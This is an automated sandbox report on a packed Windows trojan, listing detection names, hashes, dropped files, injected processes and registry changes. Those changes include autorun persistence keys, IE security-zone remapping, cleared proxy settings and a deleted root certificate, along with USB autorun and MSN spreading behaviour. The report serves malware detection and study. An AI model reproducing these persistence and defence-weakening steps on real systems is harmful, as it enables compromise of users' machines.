HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.GenericKD.1742492 (B) (Emsisoft), Trojan.GenericKD.1742492 (AdAware), GenericIRCBot.YR, GenericMSNWorm.YR, Rbot.YR, GenericAutorunWorm.YR, BackdoorIRC.YR, Blazebot.YR, GenericProxy.YR (Lavasoft MAS)Behaviour: Trojan, Backdoor, Worm, WormAutorun, IRCBot, MSNWorm, Trojan-Proxy
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 9cd12e0ded6da0d4f7c2d60be46bfb13
SHA1: 5888b67ff3eedc360bc84c3b2fd5a3c38af99f50
SHA256: ad9ee206031965e7e9d2603f5e2e2311c8a4be484085b61b92aa28568114daba
SSDeep: 12288:qK2mhAMJ/cPlcWxdFB1kFbUbKoOY6RQ7JK8rxLYZneENukuo:b2O/Gl3vr1mJIJK8rxLyubo
Size: 518387 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-06-09 16:19:49
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. |
IRCBot | A bot can communicate with command and control servers via IRC channel. |
MSNWorm | A worm can spread its copies through the MSN Messanger. |
Trojan-Proxy | This program can launch a proxy server (SOCKS4) on a designated TCP port. |
Process activity
The Trojan creates the following process(es):
pwyqire.exe:1312
rep.exe:1920
rep.exe:292
20.exe:464
20.exe:2012
hggjgh.exe:656
hggjgh.exe:1884
systemj.exe:456
system.exe:1088
%original file name%.exe:1036
iexplorer.exe:596
The Trojan injects its code into the following process(es):
pwyqire.exe:500
iexplorer.exe:1652
csrss.exe:492
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process pwyqire.exe:1312 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\L43K77.DQ9 (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (1249 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\L43K77.DQ9 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (0 bytes)
The process pwyqire.exe:500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\120[1].exe (588384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\rep[1].exe (483032 bytes)
%WinDir%\systemj.exe (589016 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab8.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4.tmp (2712 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@dropbox[1].txt (169 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar6.tmp (2712 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.dropbox[2].txt (373 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (54 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@dropbox[2].txt (169 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab5.tmp (54 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (4916 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.dropbox[1].txt (511 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (36 bytes)
%WinDir%\system.exe (483944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar9.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab3.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarA.tmp (2712 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Cab8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@dropbox[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar6.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.dropbox[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab5.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.dropbox[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarA.tmp (0 bytes)
The process rep.exe:1920 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\csrss.exe (5441 bytes)
The process rep.exe:292 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Q32K34.WE9 (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB.tmp (1137 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Q32K34.WE9 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB.tmp (0 bytes)
The process 20.exe:464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\I75K82.HU9 (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autC.tmp (1241 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\I75K82.HU9 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autC.tmp (0 bytes)
The process 20.exe:2012 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\iexplorer.exe (5873 bytes)
The process hggjgh.exe:656 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\pwyqire.exe (5441 bytes)
The process hggjgh.exe:1884 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (1249 bytes)
%Documents and Settings%\%current user%\L43K77.DQ9 (601 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (0 bytes)
%Documents and Settings%\%current user%\L43K77.DQ9 (0 bytes)
The process systemj.exe:456 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\J50H\20.exe (9665 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\J50H\__tmp_rar_sfx_access_check_1228515 (0 bytes)
The process system.exe:1088 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\J50H\rep.exe (9665 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\J50H\__tmp_rar_sfx_access_check_1228046 (0 bytes)
The process %original file name%.exe:1036 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\L75C\hggjgh.exe (10537 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\L75C\__tmp_rar_sfx_access_check_1210343 (0 bytes)
The process iexplorer.exe:596 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\I75K82.HU9 (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autD.tmp (1241 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\I75K82.HU9 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autD.tmp (0 bytes)
Registry activity
The process pwyqire.exe:1312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 90 FB 4C EE 3E 1C 7C 5B 86 D9 39 40 9C 0B 6F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process pwyqire.exe:500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Microsoft\yOLE]
"Supports RAS Connections" = "pwyqire.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\SYSTEM\CurrentControlSet\Control\Lsa]
"Supports RAS Connections" = "pwyqire.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\yOLE]
"Supports RAS Connections" = "pwyqire.exe"
[HKLM\System\CurrentControlSet\Control\Lsa]
"Supports RAS Connections" = "pwyqire.exe"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%WinDir%]
"systemj.exe" = "SSH, Telnet and Rlogin client"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3B 79 3D 8F 13 20 DD 0C 8C A0 20 B3 AF 97 EE 49"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4]
"Blob" = "19 00 00 00 01 00 00 00 10 00 00 00 63 66 4B 08"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%WinDir%]
"system.exe" = "SSH, Telnet and Rlogin client"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Supports RAS Connections" = "pwyqire.exe"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Supports RAS Connections" = "pwyqire.exe"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Supports RAS Connections" = "pwyqire.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"Supports RAS Connections" = "pwyqire.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"2796BAE63F1801E277261BA0D77770028F20EEE4"
The process rep.exe:1920 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 D4 89 6F 45 56 92 C1 03 97 B8 97 DD EF 70 5B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Remote Registry Service" = "csrss.exe"
The process rep.exe:292 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 A3 82 3C 13 15 F5 26 EB EF 08 AA 91 3B 97 02"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process 20.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 6A 91 E2 4B C2 EF 32 5C 8D 8D D5 44 7A 72 0A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process 20.exe:2012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 32 DF E0 50 A2 CE B2 EE C5 7B 62 75 CD F4 F9"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process hggjgh.exe:656 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A F8 D0 5B 9A F7 5E 23 17 7F 5D C9 EE D0 8A 64"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process hggjgh.exe:1884 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 77 9E 18 22 8E D4 FA 76 5A 63 1B 15 52 EC FE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process systemj.exe:456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 CB 68 CE 4D 08 6D 43 E0 B7 0F BE 56 ED 2C 7A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\J50H]
"20.exe" = "20"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process system.exe:1088 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "69 C8 F1 49 44 BE 65 19 65 A2 29 C0 6A 22 CB 4B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\J50H]
"rep.exe" = "rep"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process %original file name%.exe:1036 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F8 77 DF 13 4D B7 DA E3 AB D3 C4 EE 2F 50 0A CD"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
